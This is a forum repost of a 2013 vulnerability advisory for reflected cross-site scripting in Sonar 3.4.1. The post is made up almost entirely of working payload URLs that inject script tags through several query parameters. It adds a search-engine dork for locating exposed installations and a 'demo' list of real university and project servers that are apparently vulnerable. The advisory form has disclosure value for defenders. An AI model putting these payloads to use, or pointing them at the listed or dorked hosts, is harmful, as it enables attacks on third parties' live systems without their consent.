Praetorian503 Posted February 16, 2013 Report Posted February 16, 2013 Sonar version 3.4.1 suffers from a cross site scripting vulnerability.Sonar v.3.4.1 => XSS (CWE-79)+ Vendor infohttp://www.sonarsource.com/Dork : intext:"Powered by SonarSource"=========================================================+ Author: devilteam.pl+ WWW: http://devilteam.pl/=========================================================XSS:http://foo.bar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>http://foo.bar/dashboard/index/41730?did=4&period=3"><script>alert(/devilteam.pl/)</script>http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login=&assignee_login="><script>alert(/devilteam.pl/)</script>&false_positives=without&sort=&asc=false&commit=Searchhttp://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login="><script>alert(/devilteam.pl/)</script>&assignee_login=&false_positives=without&sort=&asc=false&commit=Searchhttp://foo.bar/api/sources?resource=<script>alert(/devilteam.pl/)</script>&format=txtdemo:http://nemo.sonarXsource.org/dependencies/index?search="><script>alert(/devilteam.pl/)</script>https://dev.eclipXse.org/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>https://gcrcwin.cXacr.med.umich.edu/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>http://csci3601sp12.mXorris.umn.edu:2020/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>https://redbox-build.cqXu.edu.au/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>greetz:cxsec.orgSource: http://cxsecurity.com/blad/WLB-2013020088Source: PacketStorm Quote